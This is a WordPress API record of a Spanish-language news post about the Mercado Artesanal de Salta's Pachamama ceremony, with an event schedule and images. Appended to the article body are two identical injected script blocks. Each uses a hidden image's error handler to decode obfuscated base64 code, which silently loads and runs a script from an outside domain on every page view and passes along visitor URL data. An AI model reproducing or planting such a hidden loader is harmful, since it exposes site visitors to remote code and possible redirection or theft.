{"id":4235,"date":"2024-07-30T11:30:54","date_gmt":"2024-07-30T14:30:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4235"},"modified":"2025-08-13T23:52:01","modified_gmt":"2025-08-14T02:52:01","slug":"el-mercado-artesanal-de-salta-realizara-el-tradicional-convite-a-la-pachamama","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4235","title":{"rendered":"El Mercado Artesanal de Salta realizar\u00e1 el Tradicional Convite a la Pachamama"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-bde14375d8f233f71a02d94bcc79ee93\" style=\"background-color:#810134\"><em>Las actividades tendr\u00e1n lugar el jueves 1 de agosto desde las 00 horas, con sahumada, ritual y el tradicional convite en honor a la Madre Tierra. Entrada gratuita.<\/em><\/h3>\n\n\n\n<p>El Mercado Artesanal dependiente de la&nbsp;<strong>Secretar\u00eda de Cultura<\/strong>&nbsp;de la Provincia; Asociaciones de Artesanos; el Coya Siares; la Comparsa Los Alegres del Mercado Artesanal; Comparsa Los Inkas del Tawantinsuyo y Macarena Musiquera, invitan a participar a salte\u00f1os y turistas de la tradicional ceremonia en homenaje a la Pachamama.<\/p>\n\n\n\n<p>Las actividades se desarrollar\u00e1n el jueves 1 de agosto en los diferentes espacios del Mercado Artesanal, Av. San Mart\u00edn 2555 con entrada libre y gratuita.<\/p>\n\n\n\n<p>La ceremonia a la Madre Tierra es una costumbre aborigen ancestral que llega a nuestros d\u00edas. Es un ritual de gratitud del pueblo por todo lo que la tierra les brinda.<\/p>\n\n\n\n<p>Participaron del anuncio a la prensa la directora del espacio,&nbsp;<strong>Yanina Lenti<\/strong>; el cham\u00e1n Coya Siares y referentes de la Comparsa Los Inkas del Tawantinsuyo.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13163-el-mercado-artesanal-de-salta-realizara-el-tradicional-convite-a-la-pachamama.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13163-el-mercado-artesanal-de-salta-realizara-el-tradicional-convite-a-la-pachamama.jpg\" alt=\"El Mercado Artesanal de Salta realizar\u00e1 el Tradicional Convite a la Pachamama\"\/><\/a><\/figure>\n\n\n\n<p><strong>Cronograma de actividades<\/strong><\/p>\n\n\n\n<p>00 horas: Sahumada a salones, veh\u00edculos y visitantes. Convite de mate cocido con ruda. Lugar: Playa de estacionamiento del Mercado Artesanal de Salta.<\/p>\n\n\n\n<p>12:30 horas: Patio de comidas y postres regionales. Lugar: Bar \u201cEl Patio del Mercado\u201d. Lugar: Patio interno.<\/p>\n\n\n\n<p>14:30 horas: Ritual Calchaqu\u00ed a la Madre Tierra a cargo de la Comparsa Los Inkas del Tawantinsuyo. Lugar: Patio interno.<\/p>\n\n\n\n<p>15 horas: Tradicional Convite a la Pachamama y entrega del hilo yoki a cargo del Coya Siares y Comparsa Los Alegres del Mercado Artesanal. Lugar: Patio externo.<\/p>\n\n\n\n<p>Cierre: Macarena Musiquera le canta a la Pachamama. Lugar: Patio externo.<\/p>\n\n\n\n<p>Los salones de venta y exposici\u00f3n de artesan\u00edas y gastronom\u00eda regional de las diferentes regiones de la Provincia permanecer\u00e1n abiertos al p\u00fablico de 10 a 20.30 horas.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13164-el-mercado-artesanal-de-salta-realizara-el-tradicional-convite-a-la-pachamama.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13164-el-mercado-artesanal-de-salta-realizara-el-tradicional-convite-a-la-pachamama.jpg\" alt=\"El Mercado Artesanal de Salta realizar\u00e1 el Tradicional Convite a la Pachamama\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Video Relacionado<\/h2>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Mercado Artesanal de Salta realizar\u00e1 el Tradicional Convite a la Pachamama\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/vIETchg7gro?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las actividades tendr\u00e1n lugar el jueves 1 de agosto desde las 00 horas, con sahumada, ritual y el tradicional convite en honor a la Madre Tierra. Entrada gratuita. El Mercado Artesanal dependiente de la&nbsp;Secretar\u00eda de Cultura&nbsp;de la Provincia; Asociaciones de Artesanos; el Coya Siares; la Comparsa Los Alegres del Mercado Artesanal; Comparsa Los Inkas del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4236,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4235","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4235"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4235"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4235\/revisions"}],"predecessor-version":[{"id":6730,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4235\/revisions\/6730"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4236"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}